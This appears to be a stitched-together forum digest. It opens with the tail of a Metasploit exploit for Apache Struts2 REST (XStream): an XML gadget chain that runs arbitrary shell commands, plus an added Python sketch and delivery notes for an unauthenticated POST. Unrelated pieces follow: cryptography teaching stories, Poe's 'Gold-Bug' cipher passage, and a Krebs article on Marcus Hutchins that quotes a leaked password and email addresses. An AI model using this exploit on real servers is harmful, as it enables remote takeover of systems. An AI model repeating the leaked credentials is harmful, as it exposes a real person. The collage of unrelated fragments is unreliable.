               <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
                 <is class="javax.crypto.CipherInputStream">
                   <cipher class="javax.crypto.NullCipher">
                     <initialized>false</initialized>
                     <opmode>0</opmode>
                     <serviceIterator class="javax.imageio.spi.FilterIterator">
                       <iter class="javax.imageio.spi.FilterIterator">
                         <iter class="java.util.Collections$EmptyIterator"/>
                         <next class="java.lang.ProcessBuilder">
                           <command>
                             <string>/bin/sh</string><string>-c</string><string>#{cmd}</string>
                           </command>
                           <redirectErrorStream>false</redirectErrorStream>
                         </next>
                       </iter>
                       <filter class="javax.imageio.ImageIO$ContainsFilter">
                         <method>
                           <class>java.lang.ProcessBuilder</class>
                           <name>start</name>
                           <parameter-types/>
                         </method>
                         <name>foo</name>
                       </filter>
                       <next class="string">foo</next>
                     </serviceIterator>
                     <lock/>
                   </cipher>
                   <input class="java.lang.ProcessBuilder$NullInputStream"/>
                   <ibuffer/>
                   <done>false</done>
                   <ostart>0</ostart>
                   <ofinish>0</ofinish>
                   <closed>false</closed>
                 </is>
                 <consumed>false</consumed>
               </dataSource>
               <transferFlavors/>
             </dataHandler>
             <dataLen>0</dataLen>
           </value>
         </jdk.nashorn.internal.objects.NativeString>
         <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
       </entry>
       <entry>
         <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
         <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
       </entry>
     </map>
     EOF
       end
     end

     Sursa: https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb
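Outside Metasploit, the delivery step of this exploit is a single POST with an application/xml body in which only the <command> element varies. The Python 3 sketch below illustrates that structure; the helper names, the abbreviated template (the elided gadget chain is exactly the XML in the module above), and the example URL are my own illustration. Use only against systems you are authorized to test.

```python
import string

# Skeleton of the XStream gadget-chain document; the "..." placeholders stand
# for the surrounding elements exactly as they appear in the module above.
# Only the <command> element changes per request.
XML_TEMPLATE = string.Template(
    "<map><entry><jdk.nashorn.internal.objects.NativeString>"
    "..."
    "<command><string>/bin/sh</string><string>-c</string><string>$cmd</string></command>"
    "..."
    "</jdk.nashorn.internal.objects.NativeString></entry></map>"
)

def build_body(cmd):
    # Like the module's xml_payload, cmd is interpolated verbatim, so XML
    # metacharacters (<, >, &) in the command must be avoided or escaped.
    return XML_TEMPLATE.substitute(cmd=cmd)

body = build_body("id")
print("<string>id</string>" in body)  # True

# Delivery is one POST with the right content type, e.g. (assumed local test
# instance):
#   import requests
#   requests.post("http://127.0.0.1:8080/struts2-rest-showcase/orders/3",
#                 data=build_body("id"), headers={"Content-Type": "application/xml"})
```

This mirrors what execute_command does in the module: no authentication, no special headers beyond the content type, just the XML body against the REST endpoint.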
  6. 1. Professor Krankenstein was the most influential genetic engineer of his time. When, in the spring of 2030, he almost incidentally invented the most terrible biological weapon known to humanity, it took him about three seconds to realize that should his invention fall into the hands of one of the superpowers -- or into the hands of any common idiot, really -- it could well mean the end of the human race. He wasted no time. He destroyed all the artifacts in the lab. He burned all the notes and the hard disks of all the computers they had used in the project. He seeded false information all over the place to lead future investigators off the track. Now, left with the last remaining copy of the doomsgerm recipe, he was contemplating whether to destroy it. Yes, destroying it would keep the world safe. But if such a breakthrough in genetic engineering were used in a different way, it could solve the hunger problem by producing enough artificial food to feed the swelling population of Earth. And if global warming went catastrophic, it could be used to engineer microorganisms super-efficient at sequestering carbon dioxide and methane from the atmosphere. In the end he decided not to destroy it but rather to encrypt the recipe, put it into a tungsten box, encase the box in concrete and drop it from a cruise ship into the Mariana Trench. The story would have ended there if it were not for one Hendrik Koppel, a rather simple-minded person whom professor Krankenstein had hired to help him move the tungsten-concrete box around. The professor hadn't even met him before he destroyed all his doomsgerm research. Still, Hendrik somehow realized that the issue was of interest to superpowers (was professor Krankenstein sleep-talking?) and sold the information about the location of the box to several governments. By the beginning of October the news hit that an American aircraft carrier was heading in the direction of the Mariana Trench.
Apparently, there was also a Russian nuclear submarine on its way to the same location. The Chinese government had sent a fleet of smaller, more versatile, oceanographic vessels.

After the initial bout of despair, Professor Krankenstein realized that with his superior knowledge of the position of the box he could possibly get to the location first and destroy the box using an underwater bomb. He used his life savings to buy a rusty old ship called Amor Patrio, manned it with his closest collaborators and set off for the Pacific Ocean.

... Things didn't go well. News reported that the Americans and the Chinese were approaching the area while Amor Patrio's engine broke and the crew was working around the clock to fix it. Finally, they fixed it and approached the Mariana Trench. It was at that point that the news reached them: The box had been found by the Russians and transported to Moscow. It was now stored in the vault underneath KGB headquarters. There was a whole division of spetsnaz guarding the building. The building itself was filled with special agents, each trained in twelve ways of silently killing a person.

Professor Krankenstein and his associates held a meeting on board Amor Patrio, in the middle of the Pacific Ocean. People came up with desperate proposals: Let's dig a tunnel underneath the Moscow River. Let's blackmail the Russians by re-creating the virus and threatening to disperse it in Russia. Nuke the entire Moskovskaya Oblast! There was no end to the wild and desperate proposals.

Once the stream of proposals dried up, everyone looked at Professor Krankenstein, awaiting his decision. The silence was almost palpable. Professor Krankenstein slowly took out his iconic pipe and lit it with the paper which had the decryption key written on it.

13. No full story yet, but let's assume a king is on a quest. At some point he realizes that a small item, say a specific hairpin, is needed to complete the quest.
He clearly remembers he used to own the hairpin, but he has no idea whether it's still in his possession and if so, where exactly it is. He sends a messenger home asking his counsellors to look for the hairpin and let him know whether they've found it or not.

The king's enemies need that information as well, so the next day, when the messenger is returning, they ambush him and take the message. Unfortunately, the message is encrypted. The messenger himself knows nothing about the pin. Many experienced cryptographers are working around the clock for days in a row to decrypt the message, but to no avail.

Finally, a kid wanders into the war room. She asks about what they are doing and after some thinking she says: "I know nothing about the high art of cryptography and in no way can I compare to the esteemed savants in this room. What I know, though, is that the King's palace has ten thousand rooms, each full of luxury, pictures and finely carved furniture. To find a hairpin in such a place can take weeks if not months. If there was no hairpin it would take at least that long before they could send the messenger back with a negative reply. So, if the messenger was captured on his way back on the very next day, it can mean only a single thing: The hairpin was found and your encrypted message says so."

20. Here Legrand, having re-heated the parchment, submitted it to my inspection. The following characters were rudely traced, in a red tint, between the death's-head and the goat:

53++!305))6*;4826)4+.)4+);806*;48!8`60))85;]8*:+*8!83(88)5*!;
46(;88*96*?;8)*+(;485);5*!2:*+(;4956*2(5*-4)8`8*;
4069285);)6
!8)4++;1(+9;48081;8:8+1;48!85;4)485!528806*81(+9;48;(88;4(+?3
4;48)4+;161;:188;+?;

"But," said I, returning him the slip, "I am as much in the dark as ever. Were all the jewels of Golconda awaiting me on my solution of this enigma, I am quite sure that I should be unable to earn them."
"And yet," said Legrand, "the solution is by no means so difficult as you might be led to imagine from the first hasty inspection of the characters. These characters, as any one might readily guess, form a cipher --that is to say, they convey a meaning; but then, from what is known of Kidd, I could not suppose him capable of constructing any of the more abstruse cryptographs. I made up my mind, at once, that this was of a simple species --such, however, as would appear, to the crude intellect of the sailor, absolutely insoluble without the key." "And you really solved it?" "Readily; I have solved others of an abstruseness ten thousand times greater. Circumstances, and a certain bias of mind, have led me to take interest in such riddles, and it may well be doubted whether human ingenuity can construct an enigma of the kind which human ingenuity may not, by proper application, resolve. In fact, having once established connected and legible characters, I scarcely gave a thought to the mere difficulty of developing their import. "In the present case --indeed in all cases of secret writing --the first question regards the language of the cipher; for the principles of solution, so far, especially, as the more simple ciphers are concerned, depend on, and are varied by, the genius of the particular idiom. In general, there is no alternative but experiment (directed by probabilities) of every tongue known to him who attempts the solution, until the true one be attained. But, with the cipher now before us, all difficulty is removed by the signature. The pun on the word 'Kidd' is appreciable in no other language than the English. But for this consideration I should have begun my attempts with the Spanish and French, as the tongues in which a secret of this kind would most naturally have been written by a pirate of the Spanish main. As it was, I assumed the cryptograph to be English. "You observe there are no divisions between the words. 
Had there been divisions, the task would have been comparatively easy. In such case I should have commenced with a collation and analysis of the shorter words, and, had a word of a single letter occurred, as is most likely, (a or I, for example,) I should have considered the solution as assured. But, there being no division, my first step was to ascertain the predominant letters, as well as the least frequent. Counting all, I constructed a table, thus:

Of the character 8 there are 33.
                 ;    "      26.
                 4    "      19.
                 + )  "      16.
                 *    "      13.
                 5    "      12.
                 6    "      11.
                 ! 1  "       8.
                 0    "       6.
                 9 2  "       5.
                 : 3  "       4.
                 ?    "       3.
                 `    "       2.
                 - .  "       1.

"Now, in English, the letter which most frequently occurs is e. Afterwards, the succession runs thus: a o i d h n r s t u y c f g l m w b k p q x z. E however predominates so remarkably that an individual sentence of any length is rarely seen, in which it is not the prevailing character.

"Here, then, we have, in the very beginning, the groundwork for something more than a mere guess. The general use which may be made of the table is obvious --but, in this particular cipher, we shall only very partially require its aid. As our predominant character is 8, we will commence by assuming it as the e of the natural alphabet. To verify the supposition, let us observe if the 8 be seen often in couples --for e is doubled with great frequency in English --in such words, for example, as 'meet,' 'fleet,' 'speed,' 'seen,' 'been,' 'agree,' &c. In the present instance we see it doubled less than five times, although the cryptograph is brief.

"Let us assume 8, then, as e. Now, of all words in the language, 'the' is the most usual; let us see, therefore, whether there are not repetitions of any three characters in the same order of collocation, the last of them being 8. If we discover repetitions of such letters, so arranged, they will most probably represent the word 'the.' On inspection, we find no less than seven such arrangements, the characters being ;48.
We may, therefore, assume that the semicolon represents t, that 4 represents h, and that 8 represents e --the last being now well confirmed. Thus a great step has been taken. "But, having established a single word, we are enabled to establish a vastly important point; that is to say, several commencements and terminations of other words. Let us refer, for example, to the last instance but one, in which the combination ;48 occurs --not far from the end of the cipher. We know that the semicolon immediately ensuing is the commencement of a word, and, of the six characters succeeding this 'the,' we are cognizant of no less than five. Let us set these characters down, thus, by the letters we know them to represent, leaving a space for the unknown-- t eeth. "Here we are enabled, at once, to discard the 'th,' as forming no portion of the word commencing with the first t; since, by experiment of the entire alphabet for a letter adapted to the vacancy we perceive that no word can be formed of which this th can be a part. We are thus narrowed into t ee, and, going through the alphabet, if necessary, as before, we arrive at the word 'tree,' as the sole possible reading. We thus gain another letter, r, represented by (, with the words 'the tree' in juxtaposition. "Looking beyond these words, for a short distance, we again see the combination ;48, and employ it by way of termination to what immediately precedes. We have thus this arrangement: the tree ;4(+?34 the, or substituting the natural letters, where known, it reads thus: the tree thr+?3h the. "Now, if, in place of the unknown characters, we leave blank spaces, or substitute dots, we read thus: the tree thr...h the, when the word 'through' makes itself evident at once. But this discovery gives us three new letters, o, u and g, represented by + ? and 3. 
"Looking now, narrowly, through the cipher for combinations of known characters, we find, not very far from the beginning, this arrangement, 83(88, or egree, which, plainly, is the conclusion of the word 'degree,' and gives us another letter, d, represented by !.

"Four letters beyond the word 'degree,' we perceive the combination 46(;88*.

"Translating the known characters, and representing the unknown by dots, as before, we read thus: th.rtee. an arrangement immediately suggestive of the word 'thirteen,' and again furnishing us with two new characters, i and n, represented by 6 and *.

"Referring, now, to the beginning of the cryptograph, we find the combination, 53++!.

"Translating, as before, we obtain .good, which assures us that the first letter is A, and that the first two words are 'A good.'

"To avoid confusion, it is now time that we arrange our key, as far as discovered, in a tabular form. It will stand thus:

5 represents a
!     "      d
8     "      e
3     "      g
4     "      h
6     "      i
*     "      n
+     "      o
(     "      r
;     "      t

"We have, therefore, no less than ten of the most important letters represented, and it will be unnecessary to proceed with the details of the solution. I have said enough to convince you that ciphers of this nature are readily soluble, and to give you some insight into the rationale of their development. But be assured that the specimen before us appertains to the very simplest species of cryptograph. It now only remains to give you the full translation of the characters upon the parchment, as unriddled. Here it is:

'A good glass in the bishop's hostel in the devil's seat twenty-one degrees and thirteen minutes northeast and by north main branch seventh limb east side shoot from the left eye of the death's-head a bee line from the tree through the shot fifty feet out.'"

"But," said I, "the enigma seems still in as bad a condition as ever. How is it possible to extort a meaning from all this jargon about 'devil's seats,' 'death's-heads,' and 'bishop's hostel'?"
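The frequency-counting step Legrand describes is easy to try out in code. The following Python sketch is an illustration, not part of the story: it tallies symbol frequencies in the cryptogram as printed in the tale and then applies Legrand's partial substitution key, rendering unknown symbols as dots just as he does on paper.

```python
from collections import Counter

# The cryptogram as printed in the story (a substitution cipher, no word divisions).
cryptogram = (
    "53++!305))6*;4826)4+.)4+);806*;48!8`60))85;]8*:+*8!83(88)5*!;"
    "46(;88*96*?;8)*+(;485);5*!2:*+(;4956*2(5*-4)8`8*;"
    "4069285);)6"
    "!8)4++;1(+9;48081;8:8+1;48!85;4)485!528806*81(+9;48;(88;4(+?3"
    "4;48)4+;161;:188;+?;"
)

# Step 1: tally how often each symbol occurs -- Legrand's frequency table.
counts = Counter(cryptogram)
print(counts.most_common(5))  # '8' dominates, and is assumed to stand for 'e'

# Step 2: apply the partial key from Legrand's table.
key = {'5': 'a', '!': 'd', '8': 'e', '3': 'g', '4': 'h',
       '6': 'i', '*': 'n', '+': 'o', '(': 'r', ';': 't'}

# Symbols not yet in the key become dots, as in Legrand's worked examples.
partial = ''.join(key.get(ch, '.') for ch in cryptogram)
print(partial)  # begins with "agood...", i.e. "A good ..."
```

Running it confirms the deductions in the text: '8' is the most frequent symbol, the trigram ";48" ("the") recurs, and the opening "53++!" reads "agood".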
"I confess," replied Legrand, "that the matter still wears a serious aspect, when regarded with a casual glance. My first endeavor was to divide the sentence into the natural division intended by the cryptographist."

"You mean, to punctuate it?"

"Something of that kind."

"But how was it possible to effect this?"

"I reflected that it had been a point with the writer to run his words together without division, so as to increase the difficulty of solution. Now, a not overacute man, in pursuing such an object, would be nearly certain to overdo the matter. When, in the course of his composition, he arrived at a break in his subject which would naturally require a pause, or a point, he would be exceedingly apt to run his characters, at this place, more than usually close together. If you will observe the MS., in the present instance, you will easily detect five such cases of unusual crowding. Acting on this hint, I made the division thus:

'A good glass in the bishop's hostel in the devil's seat --twenty-one degrees and thirteen minutes --northeast and by north --main branch seventh limb east side --shoot from the left eye of the death's-head --a bee-line from the tree through the shot fifty feet out.'"

"Even this division," said I, "leaves me still in the dark."

32. A portal suddenly opened on the starboard side, ejecting a fleet of imperial pursuit vessels. The propulsion system of my ship got hit before the shield activated. I tried to switch on the backup drive but before it charged to 5% I was already dangling off a dozen tractor beams. It wasn't much of a fight. They just came and picked me up as one would pick up a box of frozen strawberries in a supermarket.

I must have passed out from pressure loss, because the next thing I remember is being in a plain white room with my hands cuffed behind my back. There was a sound of a door opening and a person walked into my field of vision. It took me a few seconds to realize who the man was.
He was wearing an old-fashioned black suit and a bowler hat, black umbrella in his hand, not the baggy trousers seen on his official portraits. But then he smiled and showed the glistening golden teeth on the left side and his own healthy camel-like teeth on the right, and the realization hit me. It was him. Beylerbey Qgdzzxoglu in person.

"Peace be upon you," he said. Then he sat down on the other side of a little coffee table, made himself comfortable and put his umbrella on the floor. "We have a little matter to discuss, you and I," he said. He took a paper out of his pocket and put it on the coffee table, spinning it so that I could read it.

"Attack the Phlesmus Pashalik," said one line. "Attack the Iconium Cluster," said the line below it. The rest of the sheet was empty except for the holographic seal of the High Command of the Proximian Insurgency.

"Comandante Ribeira is no fool," he said, "and this scrap of paper is not going to convince me that he's going to split his forces and attack both those places at the same time. Our strategic machines are vastly more powerful than the Proximian ones, they've been running hot for the past week and our lab rats tell us that there's no way to win that way."

"You are right, O leader of men," I said. I knew that this kind of empty flattery was used at the Sublime Porte but I was not sure whether it wasn't reserved for the sultan alone. Qgdzzxoglu smiled snarkily but didn't say anything. Maybe I was going to live in the end. "I have no loyalty for the Proximian cause and before the rebellion I lived happily and had no thoughts of betrayal. And now, hoping for your mercy, I am going to disclose the true meaning of this message to you."

"It is a code, O you, whose slipper weighs heavily upon the neck of nations," I said. "The recipient is supposed to ignore the first sentence and only follow the second one." I hoped I hadn't overdone it. Being honest with the enemy is hard.
"So you are trying to convince me that de Ribeira is going to attack Iconium," he gave me a sharp look, apparently trying to determine whether I was lying or not. "And you know what? We've got our reports. And our reports are saying that the rebels will try to trick us into moving all our forces into Iconium and then attack the pashalik of Phlesmus while it's undefended. And if that's what you are trying to do, bad things are going to happen to your proboscis."

"The Most Holy Cross, John XXIII and Our Lady of Africa have already got a command to move to the Iconium cluster. And you should expect at least comparable firepower from elsewhere."

... The messenger has no intention of suffering to win someone else's war. At the same time it's clear that if he continues to tell the truth he will be tortured. So he says that the general is right and that it's the first sentence that should be taken into account. The general begins to feel a bit uneasy at this point. He has two contradictory confessions and it's not at all clear which one is correct. He orders the torture to proceed, only to make the messenger change his confession once again. ...

"Today, the God, the Compassionate, the Merciful has taught me that there are secrets that cannot be given away. You cannot give them away to save yourself from torture. You cannot give them away to save your kids from being sold to slavery. You cannot give them away to prevent the end of the world. You just cannot give them away, and whether you want to or not matters little."

54. Here's a simple game for kids that shows how asymmetric encryption works in principle, makes intuitive the fact that with only the public key at your disposal encryption may be easy while decryption may be so hard as to be basically impossible, and gives everyone hands-on experience with a simple asymmetric encryption system. Here's how it works: Buy a dictionary of some exotic language.
The language being exotic makes it improbable that any of the kids involved in the game would understand it. Also, it makes cheating by using Google Translate impossible. Let's say you've opted for the Eskimo language. The story of the game can be set at the North Pole, after all.

You should prefer a dictionary that comes in two volumes: an English-Eskimo dictionary and an Eskimo-English dictionary. The former will play the role of the public key and the latter the role of the secret key. Obviously, if there's no two-volume dictionary available, you'll have to cut a single-volume one in two.

To distribute the public key to everyone involved in the game you can either buy multiple copies of the English-Eskimo dictionary, which may be expensive, or you can simply place a single copy at a well-known location: in the school library, at a local mom-and-pop shop or at a secret place known only to the game participants.

If a kid wants to send an encrypted message to the owner of the secret key, they just use the public key (the English-Eskimo dictionary) to translate the message, word by word, from English to Eskimo. The owner of the secret key (the Eskimo-English dictionary) can then easily decrypt the message by translating it back into English. However, if the message gets intercepted by any other game participant, decrypting it would be an extremely time-consuming activity. Each word of the message would have to be found in the English-Eskimo dictionary, which would in turn mean scanning the whole dictionary in a page-by-page and word-by-word manner!

78. It's a puppet show. There are two hills on the stage with a country border between them. A law-abiding citizen is on the right hill. A smuggler enters the stage on the left.

SMUGGLER: Hey, you!
CITIZEN: Who? Me?
SMUGGLER: Do you like booze?
CITIZEN: Sure I do. And who are you?
SMUGGLER: I'm the person who will sell you some booze.
CITIZEN: What about cigarettes?
SMUGGLER: Sure thing. Cheap Ukrainian variety for $1 a pack. Also the Slovenian Mariboro brand.
CITIZEN: Thank God! I am getting sick of our government trying to make me healthy!

Border patrol emerges from a bush in the middle of the stage.

PATROL: Forget about it, guys! This is a state border. Nothing's gonna pass one way or the other. You better pack your stuff and go home.
SMUGGLER: Ignore him. We'll meet later on at some other place, without border patrol around, and you'll get all the booze and cigarettes you want.
PATROL: Ha! I would like to see that. Both of you are going to end up in jail.
CITIZEN: He's right. If you tell me where to meet, he's going to hear that, go there and arrest us.

... The smuggler has a list of possible places to meet: Big oak at 57th mile of the border. Lower end of Abe Smith's pasture. ... He obfuscates each entry and shouts them to the citizen in no particular order. The citizen chooses one of the puzzles and de-obfuscates it. It takes him 10 minutes. The de-obfuscated message reads: "18. Behind the old brick factory."

CITIZEN (cries): Eighteen!
SMUGGLER: Ok, got it, let's meet there in an hour!
PATROL: Oh my, oh my. I am much better at de-obfuscation than that moron citizen. I've already got two messages solved. But one has number 56, the other number 110. I have no idea which one is going to be number 18. There's no way I can find the right one in just one hour!

The curtain comes down. Happy gulping sounds can be heard from the backstage.

99. Mr. X is approached in the subway by a guy who claims to be an alien stranded on Earth and to possess a time machine that allows him to know the future. He needs funds to fix his flying saucer, but filling in the winning numbers for next week's lottery would create a time paradox. Therefore, he's willing to sell next week's winning numbers to Mr. X at a favourable price. Mr. X, as gullible as he is, feels that this may be a scam and asks for a proof. The alien gives him the next week's winning numbers in encrypted form so that Mr. X can't use them and then decide not to pay for them.
After the lottery draw he'll give Mr. X the key to unlock the file, and Mr. X can verify that the prediction was correct. After the draw, Mr. X gets the key and, lo and behold, the numbers are correct! To rule out the possibility that it happened by chance, they do the experiment twice. Then thrice. Finally, Mr. X is persuaded. He pays the alien and gets the set of numbers for the next week's draw. But the numbers drawn are completely different.

And now the question: How did the scam work?

NOTE: The claim about the time paradox is super weak. To improve the story the alien can ask for something non-monetary (sex, political influence). Or, more generally, positive demonstration of knowledge of the future can be used to make people do what you want. E.g. "I know that an asteroid is going to destroy Earth in one year. Give me all your money to build a starship to save you."

Source: https://sustrik.github.io/crypto-for-kids/
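The scam in the lottery story works because the alien's "encryption" is not binding: after the draw he can produce a key under which the ciphertext "decrypts" to whatever numbers were actually drawn (a one-time pad has exactly this property). What would close the hole is a commitment scheme. Below is a minimal, illustrative Python sketch of a hash-based commitment; the function names and the example messages are mine, not from the story.

```python
import hashlib
import secrets

def commit(message: bytes) -> tuple[bytes, bytes]:
    """Return (commitment, nonce). The commitment can be published up front;
    it binds the sender to `message` without revealing it."""
    nonce = secrets.token_bytes(16)  # random nonce keeps the message hidden
    digest = hashlib.sha256(nonce + message).digest()
    return digest, nonce

def verify(commitment: bytes, nonce: bytes, message: bytes) -> bool:
    """Anyone can later check that a revealed message matches the commitment."""
    return hashlib.sha256(nonce + message).digest() == commitment

# The "alien" commits to a prediction before the draw...
prediction = b"7 13 21 34 40 48"
c, nonce = commit(prediction)

# ...and after the draw reveals (nonce, prediction) for verification.
assert verify(c, nonce, prediction)          # honest reveal checks out
assert not verify(c, nonce, b"1 2 3 4 5 6")  # a swapped prediction fails
```

Had Mr. X demanded a commitment like this instead of an opaque "encrypted file", the alien could not have retroactively chosen a key to match the drawn numbers: finding a second message that verifies against the same SHA-256 commitment would require breaking the hash.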
  7. 05 Sep 17 Who Is Marcus Hutchins? In early August 2017, FBI agents in Las Vegas arrested 23-year-old British security researcher Marcus Hutchins on suspicion of authoring and/or selling “Kronos,” a strain of malware designed to steal online banking credentials. Hutchins was virtually unknown to most in the security community until May 2017 when the U.K. media revealed him as the “accidental hero” who inadvertently halted the global spread of WannaCry, a ransomware contagion that had taken the world by storm just days before. Relatively few knew it before his arrest, but Hutchins has for many years authored the popular cybersecurity blog MalwareTech. When this fact became more widely known — combined with his hero status for halting Wannacry — a great many MalwareTech readers quickly leapt to his defense to denounce his arrest. They reasoned that the government’s case was built on flimsy and scant evidence, noting that Hutchins has worked tirelessly to expose cybercriminals and their malicious tools. To date, some 226 supporters have donated more than $14,000 to his defense fund. Marcus Hutchins, just after he was revealed as the security expert who stopped the WannaCry worm. Image: twitter.com/malwaretechblog At first, I did not believe the charges against Hutchins would hold up under scrutiny. But as I began to dig deeper into the history tied to dozens of hacker forum pseudonyms, email addresses and domains he apparently used over the past decade, a very different picture began to emerge. In this post, I will attempt to describe and illustrate more than three weeks’ worth of connecting the dots from what appear to be Hutchins’ earliest hacker forum accounts to his real-life identity. The clues suggest that Hutchins began developing and selling malware in his mid-teens — only to later develop a change of heart and earnestly endeavor to leave that part of his life squarely in the rearview mirror. 
GH0STHOSTING/IARKEY

I began this investigation with a simple search of domain name registration records at domaintools.com [full disclosure: Domain Tools recently was an advertiser on this site]. A search for “Marcus Hutchins” turned up a half dozen domains registered to a U.K. resident by the same name who supplied the email address “surfallday2day@hotmail.co.uk.”

One of those domains — Gh0sthosting[dot]com (the third character in that domain is a zero) — corresponds to a hosting service that was advertised and sold circa 2009-2010 on Hackforums[dot]net, a massively popular forum overrun with young, impressionable men who desperately wish to be elite coders or hackers (or at least recognized as such by their peers).

The surfallday2day@hotmail.co.uk address tied to Gh0sthosting’s initial domain registration records also was used to register a Skype account named Iarkey that listed its alias as “Marcus.” A Twitter account registered in 2009 under the nickname “Iarkey” points to Gh0sthosting[dot]com.

Gh0sthosting was sold by a Hackforums user who used the same Iarkey nickname, and in 2009 Iarkey told fellow Hackforums users in a sales thread for his business that Gh0sthosting was “mainly for blackhats wanting to phish.” In a separate post just a few days apart from that sales thread, Iarkey responds that he is “only 15” years old, and in another he confirms that his email address is surfallday2day@hotmail.co.uk.

A review of the historic reputation tied to the Gh0sthosting domain suggests that at least some customers took Iarkey up on his offer: Malwaredomainlist.com, for example, shows that around this same time in 2009 Gh0sthosting was observed hosting plenty of malware, including trojan horse programs, phishing pages and malware exploits.

A “reverse WHOIS” search at Domaintools.com shows that Iarkey’s surfallday2day email address was used initially to register several other domains, including uploadwith[dot]us and thecodebases[dot]com.
Shortly after registering Gh0sthosting and other domains tied to his surfallday2day@hotmail.co.uk address, Iarkey evidently thought better of including his real name and email address in his domain name registration records. Thecodebases[dot]com, for example, changed its WHOIS ownership to a “James Green” in the U.K., and switched the email to “herpderpderp2@hotmail.co.uk.”

A reverse WHOIS lookup at domaintools.com for that email address shows it was used to register a Hackforums parody (or phishing?) site called Heckforums[dot]net. The domain records showed this address was tied to a Hackforums clique called “Atthackers.” The records also listed a Michael Chanata from Florida as the owner. We’ll come back to Michael Chanata and Atthackers at the end of this post.

DA LOSER/FLIPERTYJOPKINS

As early as 2009, Iarkey was outed several times on Hackforums as being Marcus Hutchins from the United Kingdom. In most of those instances he makes no effort to deny the association — and in a handful of posts he laments that fellow members felt the need to “dox” him by posting his real address and name in the hacking forum for all to see.

Iarkey, like many other extremely active Hackforums users, changed his nickname on the forum constantly, and two of his early nicknames on Hackforums around 2009 were “Flipertyjopkins” and “Da Loser.”

Hackforums user “Da Loser” is doxed by another member.

Happily, Hackforums has a useful feature that allows anyone willing to take the time to dig through a user’s postings to learn when and if that user was previously tied to another account. This is especially evident in multi-page Hackforums discussion threads that span many days or weeks: If a user changes his nickname during that time, the forum is set up so that it includes the user’s most previous nickname in any replies that quote the original nickname — ostensibly so that users can follow along with who’s who and who said what to whom.
In the screen shot below, for instance, we can see one of Hutchins’ earliest accounts — Da Loser — being quoted under his Flipertyjopkins nickname. A screen shot showing Hackforums’ tendency to note when users switch between different usernames. Both the Da Loser and Flipertyjopkins identities on Hackforums referenced the same domains in 2009 as theirs — Gh0sthosting — as well as another domain called “hackblack.co[dot]uk.” Da Loser references the hackblack domain as the place where other Hackforums users can download “the sourcecode of my IE/MSN messenger password stealer (aka M_Stealer).” In another post, Da Loser brags about how his password stealing program goes undetected by multiple antivirus scanners, pointing to a (now deleted) screenshot at a Photobucket account for a “flipertyjopkins”: Another screenshot from Da Loser’s postings in June 2009 shows him advertising the Hackblack domain and the Surfallday2day@hotmail.co.uk address: Hackforums user “Da Loser” advertises his “Hackblack” hosting and points to the surfallday2day email address. An Internet search for this Hackblack domain reveals a thread on the Web hosting forum MyBB started by a user Flipertyjopkins, who asks other members for help configuring his site, which he lists as http://hackblack.freehost10[dot]com. A user named Flipertyjopkins asks for help for his domain, hackblack.freehost10[dot]com. Poking around the Web for these nicknames and domains turned up a Youtube user account named Flipertyjopkins that includes several videos uploaded 7-8 years ago that instruct viewers on how to use various types of password-stealing malware. In one of the videos — titled “Hotmail cracker v1.3” — Flipertyjopkins narrates how to use a piece of malware by the same name to steal passwords from unsuspecting victims. Approximately two minutes and 48 seconds into the video, we can briefly see an MSN Messenger chat window shown behind the Microsoft Notepad application he is using to narrate the video. 
The video clearly shows that the MSN Messenger client is logged in with the address “hutchins22@hotmail.com.”

The email address “hutchins22@hotmail.com” can be seen briefly in the background of this video.

To close out the discussion of Flipertyjopkins, I should note that this email address showed up multiple times in the database leak from Hostinger.co.uk, a British Web hosting company that got hacked in 2015. A copy of that database can be found in several places online, and it shows that one Hostinger customer named Marcus used an account under the email address flipertyjopkins@gmail.com.

According to the leaked user database, the password for that account — “emmy009” — also was used to register two other accounts at Hostinger, including the usernames “hacker” (email address: flipertyjopkins@googlemail.com) and “flipertyjopkins” (email: surfallday2day@hotmail.co.uk).

ELEMENT PRODUCTS/GONE WITH THE WIND

Most of the activities and actions that can be attributed to Iarkey/Flipertyjopkins/Da Loser et. al on Hackforums are fairly small-time — and hardly rise to the level of coding from scratch a complex banking trojan and selling it to cybercriminals.

However, multiple threads on Hackforums state that Hutchins around 2011-2012 switched to two new nicknames that corresponded to users who were far more heavily involved in coding and selling complex malicious software: “Element Products,” and later, “Gone With The Wind.”

Hackforums’ nickname preservation feature leaves little doubt that the user Element Products at some point in 2012 changed his nickname to Gone With the Wind. However, for almost a week I could not see any signs of a connection between these two accounts and the ones previously and obviously associated with Hutchins (Flipertyjopkins, Iarkey, etc.).
In the meantime, I endeavored to find out as much as possible about Element Products — a suite of software and services including a keystroke logger, a “stresser” or online attack service, as well as a “no-distribute” malware scanner. Unlike legitimate scanning services such as Virustotal — which scan malicious software against dozens of antivirus tools and then share the output with all participating antivirus companies — no-distribute scanners are made and marketed to malware authors who wish to see how broadly their malware is detected without tipping off the antivirus firms to a new, more stealthy version of the code. Indeed, Element Scanner — which was sold in subscription packages starting at $40 per month — scanned all customer malware with some 37 different antivirus tools. But according to posts from Gone With the Wind, the scanner merely resold the services of scan4you[dot]net, a multiscanner that was extremely powerful and popular for several years across a variety of underground cybercrime forums. According to a story at Bleepingcomputer.com, scan4you disappeared in July 2017, around the same time that two Latvian men were arrested for running an unnamed no-distribute scanner. [Side note: Element Scanner was later incorporated as the default scanning application of “Blackshades,” a remote access trojan that was extremely popular on Hackforums for several years until its developers and dozens of customers were arrested in an international law enforcement sting in May 2014. Incidentally, as the story linked in the previous sentence explains, the administrator and owner of Hackforums would play an integral role in setting up many of his forum’s users for the Blackshades sting operation.] 
